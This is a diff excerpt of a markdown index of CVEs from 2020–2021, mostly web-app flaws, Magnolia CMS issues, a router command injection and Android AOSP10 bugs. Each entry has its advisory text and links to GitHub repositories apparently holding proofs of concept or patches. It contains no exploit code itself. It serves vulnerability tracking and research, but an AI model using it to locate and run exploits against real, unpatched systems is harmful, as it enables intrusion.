+- [miguelc49/CVE-2021-46063-1](https://github.com/miguelc49/CVE-2021-46063-1)
+- [miguelc49/CVE-2021-46063-3](https://github.com/miguelc49/CVE-2021-46063-3)
+
+### CVE-2021-46067 (2022-01-06)
+
+In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover.
+
+
+- [plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover)
+- [plsanu/CVE-2021-46067](https://github.com/plsanu/CVE-2021-46067)
+
+### CVE-2021-46068 (2022-01-06)
+
+A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.
+
+
+- [plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS)
+- [plsanu/CVE-2021-46068](https://github.com/plsanu/CVE-2021-46068)
+
+### CVE-2021-46069 (2022-01-06)
+
+A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
+
+
+- [plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS)
+- [plsanu/CVE-2021-46069](https://github.com/plsanu/CVE-2021-46069)
+
+### CVE-2021-46070 (2022-01-06)
+
+A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel.
+
+
+- [plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS)
+- [plsanu/CVE-2021-46070](https://github.com/plsanu/CVE-2021-46070)
+
+### CVE-2021-46071 (2022-01-06)
+
+A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.
+
+
+- [plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS)
+- [plsanu/CVE-2021-46071](https://github.com/plsanu/CVE-2021-46071)
+
+### CVE-2021-46072 (2022-01-06)
+
+A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.
+
+
+- [plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS)
+- [plsanu/CVE-2021-46072](https://github.com/plsanu/CVE-2021-46072)
+
+### CVE-2021-46073 (2022-01-06)
+
+A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.
+
+
+- [plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS)
+- [plsanu/CVE-2021-46073](https://github.com/plsanu/CVE-2021-46073)
+
+### CVE-2021-46074 (2022-01-06)
+
+A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel.
+
+
+- [plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS)
+- [plsanu/CVE-2021-46074](https://github.com/plsanu/CVE-2021-46074)
+
+### CVE-2021-46075 (2022-01-06)
+
+A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations.
+
+
+- [plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations)
+- [plsanu/CVE-2021-46075](https://github.com/plsanu/CVE-2021-46075)
+
+### CVE-2021-46076 (2022-01-06)
+
+Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution.
+
+
+- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution)
+- [plsanu/CVE-2021-46076](https://github.com/plsanu/CVE-2021-46076)
+
+### CVE-2021-46078 (2022-01-06)
+
+An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.
+
+
+- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting)
+- [plsanu/CVE-2021-46078](https://github.com/plsanu/CVE-2021-46078)
+
+### CVE-2021-46079 (2022-01-06)
+
+An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.
+
+
+- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection)
+- [plsanu/CVE-2021-46079](https://github.com/plsanu/CVE-2021-46079)
+
+### CVE-2021-46080 (2022-01-06)
+
+A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.
+
+
+- [plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS)
+- [plsanu/CVE-2021-46080](https://github.com/plsanu/CVE-2021-46080)
+
+### CVE-2021-46108 (2022-02-18)
+
+D-Link DSL-2730E CT-20131125 devices allow XSS via the username parameter to the password page in the maintenance configuration.
+
+
+- [g-rubert/CVE-2021-46108](https://github.com/g-rubert/CVE-2021-46108)
+
+### CVE-2021-46143 (2022-01-06)
+
+In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize.
+
+
+- [nanopathi/external_expat_AOSP10_r33_CVE-2021-46143](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2021-46143)
+
+### CVE-2021-46361 (2022-02-11)
+
+An issue in the Freemark Filter of Magnolia CMS v6.2.11 and below allows attackers to bypass security restrictions and execute arbitrary code via a crafted FreeMarker payload.
+
+
+- [mbadanoiu/CVE-2021-46361](https://github.com/mbadanoiu/CVE-2021-46361)
+
+### CVE-2021-46362 (2022-02-11)
+
+A Server-Side Template Injection (SSTI) vulnerability in the Registration and Forgotten Password forms of Magnolia v6.2.3 and below allows attackers to execute arbitrary code via a crafted payload entered into the fullname parameter.
+
+
+- [mbadanoiu/CVE-2021-46362](https://github.com/mbadanoiu/CVE-2021-46362)
+
+### CVE-2021-46363 (2022-02-11)
+
+An issue in the Export function of Magnolia v6.2.3 and below allows attackers to perform Formula Injection attacks via crafted CSV/XLS files. These formulas may result in arbitrary code execution on a victim's computer when opening the exported files with Microsoft Excel.
+
+
+- [mbadanoiu/CVE-2021-46363](https://github.com/mbadanoiu/CVE-2021-46363)
+
+### CVE-2021-46364 (2022-02-11)
+
+A vulnerability in the Snake YAML parser of Magnolia CMS v6.2.3 and below allows attackers to execute arbitrary code via a crafted YAML file.
+
+
+- [mbadanoiu/CVE-2021-46364](https://github.com/mbadanoiu/CVE-2021-46364)
+
+### CVE-2021-46365 (2022-02-11)
+
+An issue in the Export function of Magnolia v6.2.3 and below allows attackers to execute XML External Entity attacks via a crafted XLF file.
+
+
+- [mbadanoiu/CVE-2021-46365](https://github.com/mbadanoiu/CVE-2021-46365)
+
+### CVE-2021-46366 (2022-02-11)
+
+An issue in the Login page of Magnolia CMS v6.2.3 and below allows attackers to exploit both an Open Redirect vulnerability and Cross-Site Request Forgery (CSRF) in order to brute force and exfiltrate users' credentials.
+
+
+- [mbadanoiu/CVE-2021-46366](https://github.com/mbadanoiu/CVE-2021-46366)
+
+### CVE-2021-46381 (2022-03-04)
+
+Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
+
+
+- [JCPpeiqi/-cve-2021-46381](https://github.com/JCPpeiqi/-cve-2021-46381)
+
+### CVE-2021-46398 (2022-02-04)
+
+A Cross-Site Request Forgery vulnerability exists in Filebrowser < 2.18.0 that allows attackers to create a backdoor user with admin privilege and get access to the filesystem via a malicious HTML webpage that is sent to the victim. An admin can run commands using the FileBrowser and hence it leads to RCE.
+
+
+- [febinrev/CVE-2021-46398_Chamilo-LMS-RCE](https://github.com/febinrev/CVE-2021-46398_Chamilo-LMS-RCE)
+- [LalieA/CVE-2021-46398](https://github.com/LalieA/CVE-2021-46398)
+
+### CVE-2021-46417 (2022-04-07)
+
+Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580.
+
+
+- [Henry4E36/CVE-2021-46417](https://github.com/Henry4E36/CVE-2021-46417)
+
+### CVE-2021-46422 (2022-04-27)
+
+Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
+
+
+- [nobodyatall648/CVE-2021-46422](https://github.com/nobodyatall648/CVE-2021-46422)
+- [Chocapikk/CVE-2021-46422](https://github.com/Chocapikk/CVE-2021-46422)
+- [twoning/CVE-2021-46422_PoC](https://github.com/twoning/CVE-2021-46422_PoC)
+- [5l1v3r1/CVE-2021-46422](https://github.com/5l1v3r1/CVE-2021-46422)
+- [Awei507/CVE-RCE](https://github.com/Awei507/CVE-RCE)
+- [yigexioabai/CVE-2021-46422_RCE](https://github.com/yigexioabai/CVE-2021-46422_RCE)
+- [ZAxyr/CVE-2021-46422](https://github.com/ZAxyr/CVE-2021-46422)
+- [xanszZZ/SDT_CW3B1_rce](https://github.com/xanszZZ/SDT_CW3B1_rce)
+- [latings/CVE-2021-46422](https://github.com/latings/CVE-2021-46422)
+- [CJ-0107/cve-2021-46422](https://github.com/CJ-0107/cve-2021-46422)
+- [kelemaoya/CVE-2021-46422](https://github.com/kelemaoya/CVE-2021-46422)
+- [yyqxi/CVE-2021-46422](https://github.com/yyqxi/CVE-2021-46422)
+- [polerstar/CVE-2021-46422-poc](https://github.com/polerstar/CVE-2021-46422-poc)
+- [kailing0220/CVE-2021-46422](https://github.com/kailing0220/CVE-2021-46422)
+- [tucommenceapousser/CVE-2021-46422](https://github.com/tucommenceapousser/CVE-2021-46422)
+
+### CVE-2021-46702 (2022-02-26)
+
+Tor Browser 9.0.7 on Windows 10 build 10586 is vulnerable to information disclosure. This could allow local attackers to bypass the intended anonymity feature and obtain information regarding the onion services visited by a local user. This can be accomplished by analyzing RAM memory even several hours after the local user used the product. This occurs because the product doesn't properly free memory.
+
+
+- [malakkf/CVE-2021-46702](https://github.com/malakkf/CVE-2021-46702)
+
+### CVE-2021-46703 (2022-03-06)
+
+In the IsolatedRazorEngine component of Antaris RazorEngine through 4.5.1-alpha001, an attacker can execute arbitrary .NET code in a sandboxed environment (if users can externally control template contents). NOTE: This vulnerability only affects products that are no longer supported by the maintainer
+
+
+- [BenEdridge/CVE-2021-46703](https://github.com/BenEdridge/CVE-2021-46703)
+
+### CVE-2021-46704 (2022-03-06)
+
+In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.
+
+
+- [MithatGuner/CVE-2021-46704-POC](https://github.com/MithatGuner/CVE-2021-46704-POC)
+- [Erenlancaster/CVE-2021-46704](https://github.com/Erenlancaster/CVE-2021-46704)
+
+### CVE-2021-56789
+- [DataSurgeon-ds/ds-cve-plugin](https://github.com/DataSurgeon-ds/ds-cve-plugin)
+
+### CVE-2021-268855
+- [sikkertech/CVE-2021-268855](https://github.com/sikkertech/CVE-2021-268855)
+
## 2020
+### CVE-2020-0001 (2020-01-08)
+
+In getProcessRecordLocked of ActivityManagerService.java isolated apps are not handled correctly. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.0, Android-8.1, Android-9, and Android-10 Android ID: A-140055304
+
+
+- [Zachinio/CVE-2020-0001](https://github.com/Zachinio/CVE-2020-0001)
+
### CVE-2020-0014 (2020-02-13)
It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable. This could lead to a local escalation of privilege with no additional execution privileges needed. User action is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-128674520
@@ -5429,6 +22383,8 @@
- [k3vinlusec/Bluefrag_CVE-2020-0022](https://github.com/k3vinlusec/Bluefrag_CVE-2020-0022)
- [Polo35/CVE-2020-0022](https://github.com/Polo35/CVE-2020-0022)
- [5k1l/cve-2020-0022](https://github.com/5k1l/cve-2020-0022)
+- [lsw29475/CVE-2020-0022](https://github.com/lsw29475/CVE-2020-0022)
+- [devdanqtuan/poc-for-cve-2020-0022](https://github.com/devdanqtuan/poc-for-cve-2020-0022)
- [themmokhtar/CVE-2020-0022](https://github.com/themmokhtar/CVE-2020-0022)
### CVE-2020-0023 (2020-02-13)
@@ -5445,6 +22401,8 @@
- [bluefrostsecurity/CVE-2020-0041](https://github.com/bluefrostsecurity/CVE-2020-0041)
- [j4nn/CVE-2020-0041](https://github.com/j4nn/CVE-2020-0041)
+- [koharin/CVE-2020-0041](https://github.com/koharin/CVE-2020-0041)
+- [vaginessa/CVE-2020-0041-Pixel-3a](https://github.com/vaginessa/CVE-2020-0041-Pixel-3a)
- [jcalabres/root-exploit-pixel3](https://github.com/jcalabres/root-exploit-pixel3)
### CVE-2020-0069 (2020-03-10)
@@ -5458,6 +22416,13 @@
- [quarkslab/CVE-2020-0069_poc](https://github.com/quarkslab/CVE-2020-0069_poc)
- [0xf15h/mtk_su](https://github.com/0xf15h/mtk_su)
+### CVE-2020-0082 (2020-04-17)
+
+In ExternalVibration of ExternalVibration.java, there is a possible activation of an arbitrary intent due to unsafe deserialization. This could lead to local escalation of privilege to system_server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-140417434
+
+
+- [0x742/CVE-2020-0082-ExternalVibration](https://github.com/0x742/CVE-2020-0082-ExternalVibration)
+
### CVE-2020-0096 (2020-05-14)
In startActivities of ActivityStartController.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9Android ID: A-145669109
@@ -5508,15 +22473,61 @@
In setIPv6AddrGenMode of NetworkManagementService.java, there is a possible bypass of networking permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-141920289
+- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0137](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0137)
- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137)
+### CVE-2020-0138 (2020-06-11)
+
+In get_element_attr_rsp of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution if bluetoothtbd were used, which it isn't in typical Android platforms, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-142878416
+
+
+- [Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138](https://github.com/Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138)
+
+### CVE-2020-0155 (2020-06-11)
+
+In phNxpNciHal_send_ese_hal_cmd of phNxpNciHal_ext.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-139736386
+
+
+- [Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155](https://github.com/Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155)
+
+### CVE-2020-0160 (2020-06-11)
+
+In setSyncSampleParams of SampleTable.cpp, there is possible resource exhaustion due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-124771364
+
+
+- [nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160)
+
+### CVE-2020-0181 (2020-06-11)
+
+In exif_data_load_data_thumbnail of exif-data.c, there is a possible denial of service due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145075076
+
+
+- [Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181](https://github.com/Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181)
+
### CVE-2020-0183 (2020-06-11)
In handleMessage of BluetoothManagerService, there is an incomplete reset. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-110181479
+- [nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183](https://github.com/nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183)
- [hshivhare67/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183](https://github.com/hshivhare67/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183)
+### CVE-2020-0188 (2020-06-11)
+
+In onCreatePermissionRequest of SettingsSliceProvider.java, there is a possible permissions bypass due to a PendingIntent error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-147355897
+
+
+- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188)
+- [ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188](https://github.com/ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188)
+- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219)
+
+### CVE-2020-0198 (2020-06-11)
+
+In exif_data_load_data_content of exif-data.c, there is a possible UBSAN abort due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-146428941
+
+
+- [Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198](https://github.com/Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198)
+
### CVE-2020-0201 (2020-06-11)
In showSecurityFields of WifiConfigController.java there is a possible credential leak due to a confused deputy. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-143601727
@@ -5525,11 +22536,167 @@
- [uthrasri/Packages_app_settings_CVE-2020-0201](https://github.com/uthrasri/Packages_app_settings_CVE-2020-0201)
- [Trinadh465/packages_apps_Settings_CVE-2020-0201](https://github.com/Trinadh465/packages_apps_Settings_CVE-2020-0201)
+### CVE-2020-0203 (2020-06-11)
+
+In freeIsolatedUidLocked of ProcessList.java, there is a possible UID reuse due to improper cleanup. This could lead to local escalation of privilege between constrained processes with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-146313311
+
+
+- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203)
+
+### CVE-2020-0209 (2020-06-11)
+
+In multiple functions of AccountManager.java, there is a possible permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145206842
+
+
+- [pazhanivel07/frameworks_base_CVE-2020-0209](https://github.com/pazhanivel07/frameworks_base_CVE-2020-0209)
+
+### CVE-2020-0215 (2020-06-11)
+
+In onCreate of ConfirmConnectActivity.java, there is a possible leak of Bluetooth information due to a permissions bypass. This could lead to local escalation of privilege that exposes a pairing Bluetooth MAC address with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1 Android ID: A-140417248
+
+
+- [Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215](https://github.com/Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215)
+
+### CVE-2020-0218 (2020-06-11)
+
+In loadSoundModel and related functions of SoundTriggerHwService.cpp, there is possible out of bounds write due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-136005905
+
+
+- [pazhanivel07/frameworks_av-CVE-2020-0218](https://github.com/pazhanivel07/frameworks_av-CVE-2020-0218)
+
+### CVE-2020-0219 (2020-06-11)
+
+In onCreate of SliceDeepLinkSpringBoard.java there is a possible insecure Intent. This could lead to local elevation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-122836081
+
+
+- [pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219](https://github.com/pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219)
+- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219)
+- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old)
+- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one)
+
+### CVE-2020-0225 (2020-07-17)
+
+In a2dp_vendor_ldac_decoder_decode_packet of a2dp_vendor_ldac_decoder.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-142546668
+
+
+- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0225](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0225)
+
+### CVE-2020-0226 (2020-07-17)
+
+In createWithSurfaceParent of Client.cpp, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege in the graphics server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-150226994
+
+
+- [Trinadh465/frameworks_native_CVE-2020-0226](https://github.com/Trinadh465/frameworks_native_CVE-2020-0226)
+- [ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226](https://github.com/ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226)
+
+### CVE-2020-0227 (2020-07-17)
+
+In onCommand of CompanionDeviceManagerService.java, there is a possible permissions bypass due to a missing permission check. This could lead to local escalation of privilege allowing background data usage or launching from the background, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-129476618
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0227](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0227)
+
+### CVE-2020-0240 (2020-08-11)
+
+In NewFixedDoubleArray of factory.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-150706594
+
+
+- [ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240](https://github.com/ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240)
+
+### CVE-2020-0241 (2020-08-11)
+
+In NuPlayerStreamListener of NuPlayerStreamListener.cpp, there is possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-151456667
+
+
+- [nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241)
+
+### CVE-2020-0242 (2020-08-11)
+
+In reset of NuPlayerDriver.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the media server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-151643722
+
+
+- [pazhanivel07/frameworks_av-10-r33_CVE-2020-0242](https://github.com/pazhanivel07/frameworks_av-10-r33_CVE-2020-0242)
+- [pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243](https://github.com/pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243)
+
+### CVE-2020-0245 (2020-09-17)
+
+In DecodeFrameCombinedMode of combined_decode.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-152496149
+
+
+- [Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245](https://github.com/Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245)
+
+### CVE-2020-0377 (2020-10-14)
+
+In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-158833854
+
+
+- [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377)
+
+### CVE-2020-0380 (2020-09-17)
+
+In allocExcessBits of bitalloc.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-146398979
+
+
+- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2020-0380](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2020-0380)
+
+### CVE-2020-0381 (2020-09-17)
+
+In Parse_wave of eas_mdls.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote information disclosure in a highly constrained process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-150159669
+
+
+- [Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381](https://github.com/Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381)
+
+### CVE-2020-0391 (2020-09-17)
+
+In applyPolicy of PackageManagerService.java, there is possible arbitrary command execution as System due to an unenforced protected-broadcast. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-158570769
+
+
+- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0391](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0391)
+
+### CVE-2020-0392 (2020-09-17)
+
+In getLayerDebugInfo of SurfaceFlinger.cpp, there is a possible code execution due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-150226608
+
+
+- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392)
+
+### CVE-2020-0394 (2020-09-17)
+
+In onCreate of BluetoothPairingDialog.java, there is a possible tapjacking vector due to an insecure default value. This could lead to local escalation of privilege and untrusted devices accessing contact lists with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-155648639
+
+
+- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0394](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0394)
+- [pazhanivel07/Settings_10-r33_CVE-2020-0394](https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394)
+- [pazhanivel07/Settings_10-r33_CVE-2020-0394_02](https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394_02)
+
+### CVE-2020-0401 (2020-09-17)
+
+In setInstallerPackageName of PackageManagerService.java, there is a missing permission check. This could lead to local escalation of privilege and granting spurious permissions with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-150857253
+
+
+- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0401](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0401)
+- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0401](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0401)
+
+### CVE-2020-0409 (2020-11-10)
+
